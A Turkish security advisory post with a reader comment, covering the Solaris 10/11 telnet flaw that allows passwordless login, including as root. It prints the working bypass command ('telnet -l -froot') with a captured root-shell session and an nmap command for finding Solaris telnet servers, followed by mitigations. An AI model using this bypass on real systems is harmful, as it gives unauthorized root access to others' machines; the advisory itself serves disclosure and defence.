Solaris Sistemlerde Ciddi Güvenlik Açığı

0
FZ
Dün yayınlanan ve sadece Sun Solaris 10, Solaris 11 işletim sistemlerini etkileyen güvenlik açığı telnet servisine herhangi bir sistem kullanıcısının parolasız bağlanabilmesini sağlıyor. Eğer root kullanıcısının telnet erişim yetkisi varsa bu, parolayı bilmeden sisteme tam yetkili erişilmesi manasına geliyor. Benzer bir açık 1994 yılında bazı UNIX sistemlerinde de görülmüştü.

Güvenlik açığını nasıl test edersiniz?

$telnet -l -fkullanici_adi hedef_sistem

fbsd~$ telnet -l -froot 10.1.1.1

Trying 10.1.1.1...

Connected to 10.1.1.1.

Escape character is '^]'.

[ Trying mutual KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

[ Trying KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

Last login: Mon Feb 12 15:20:12 on console

Sun Microsystems Inc.   SunOS 5.10      Generic January 2005

Sourcing //.profile-EIS.....

root@solaris-test #

Ek olarak ağınızdaki Solaris tabanlı telnet sunucuları bulmak için nmap kullanabilirsiniz.

#nmap -sV  -p23 AĞ_Bloğunuz -oG solaris_telnet|grep "Sun Solaris"

Korunma Yolları

1) Solaris sistemden telnet servisi kapatılıp yerine daha güvenli erişim yöntemi olan SSH tercih edilebilir.

Telneti kapatmak için

solaris-test# svcadm disable telnet

2)Telnet servisi açık kalması gerekiyorsa öncelikle sisteme root kullanıcısının erişimi kısıtlanmalı. Bu en azından sisteme en yetkili hesapla bağlanılmasını engeller fakat sistemdeki diğer kullanıcıların(sys,adm, lp, vs.) sisteme parolasız erişimi hala mümkün olmaktadır.

Adım Adım telnet ile sisteme root erişimini engellemek /etc/default/login dosyası açılır. #CONSOLE=/dev/console satırı bulunur ve başındaki # kaldırılır. 3)Telnet servisine yapılan erişimler IP tabanlı kısıtlanabilir. Bunun için Solaris'de tcp_wrapper ve IPF kullanılabilir. Telnet servisi için tcp_wrapper desteğini aktif ederek telnet servisine yapılan erişimler ip/network tabanlı kısıtlamak için,

Telnet servisine için tcp_wrapper desteği verilir

#inetadm -m telnet tcp_wrappers=TRUE

ve /etc/hosts.allow, /etc/hosts.deny dosyaları kullanılarak belirli IP/ağlara erişim tanımlanır.

Huzeyfe ÖNAL - huzeyfe at enderunix.org

Görüşler

0
elrond
Şaka gibi bir açık bu. Şirkette adminlere söyledim kapatın şu rezillikleri diye inanmadılar ilk başta...

Asıl garip olan niye şimdi public oldu...
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Greasemonkey Güvenlik Açığı

butch

Oldukça ilgi gören Firefox eklentilerinden biri olan Greasemonkey'in geliştiricileri tarafından yapılan açıklamaya göre, eklentide kullanıcıların bilgisayarlarında bulunan verilere erişim sağlayan önemli bir güvenlik açığı bulunuyor. Greasemonkey kullanıcılarının eklentiyi kaldırmaları şiddetle öneriliyor. Detaylar için eweek.com ve mozdev.org.

SecurityFocus Internet Tarayıcı Uyarısı

Soulblighter

Daha önce "BugTraq Tarayıcı Testi" ile ilgili bir yazı yollamıştım. Bu yazıdan sonra SecurityFocus internet tarayıcılarla ilgili uyarıları yayınladı. BugTraq testinde IE'nin kodunun diğerlerinden daha iyi olduğu ve hatalı HTML kodlarını düzgün sorunsuz yorumladığına dair bilgi verilmişti. Fakat SecurityFocus aynı uyarıyı IE için de yapmış. Kısacası IE dahil tüm tarayıcılar bu soruna sahip. Ben de size SecurityFocus sonuçlarını çeviriyorum.

OpenBSD Paket Süzgeci Türkçe Kullanım Kılavuzu

anonim

PF Tcp/Ip trafiğini süzme ve ağ adres dönüşümü (NAT) sağlayan bir OpenBSD sistemidir. Bu sistemin temel ayarları ile ilgili ilk türkçe doküman yayımlandı. Söz konusu belgeye bu adresten erişilebilir.

Yazılım Yalan Söyler Mi? Adobe Acrobat Reader Vakası

FZ

Language Blog isimli ve genellikle dilbilimcilerin yazdığı bir kolektif blog'da Adobe Acrobat Reader ile ilgili bir girdi dikkatimi çekti.

Yazara göre Acrobat Reader'in Preferences kısmına gelir ve JavaScript'i kaldırmaya çalışırsanız baktığınız belgede JavaScript kullanıldığına ve bu özellik kaldırılırsa düzgün görüntüleme yapılamayacağına dair bir uyarı geliyor. Blog girdisinin yazarı Acrobat Reader 6.0.3'ü Mac üzerinde kullanırken böyle bir deneme yaptığında benzer bir şeyle karşılaştığını ancak işin garibi söz konusu belgenin kendi hazırladığı ve LaTeX'ten PDF'ye dönüştürdüğü bir belge olduğunu dolayısı ile JavaScript filan içermediğini belirtiyor! Dolayısı ile programın yalan söylemesi söz konusu.

Belgelerde JavaScript kullanılmasının sebebi ise Remote Approach isimli bir şirketin PDF okunduğu zaman bunun okundu bilgisini Internet üzerinden başka bir yere iletecek bir sistem geliştirmiş olması. "Web bug"lardan sonra başımıza bir de bu çıktı ;-) Neyse ki Acrobat Reader'daki JavaScript uyarılara rağmen iptal edilebiliyor.

ADSL Modem Öntanımlı Parola Zayıflığı

extacy

Bu açık başka ülkelerde var mıdır bilmem ama bizim ülkemiz insanlarında %80 oranında geçerlidir :(

Bunun nedeni bilgisizlik midir, vurdum duymazlık mıdır bilmem ama... sonuçları çok kötü olabilir. Malum güzel ülkemin her yanı ADSL ile yeni yeni tanışmaya başladı fakat beraberinde yeni bir sorun getirdi. Lafı kisa tutup soruna geçmek istiyorum.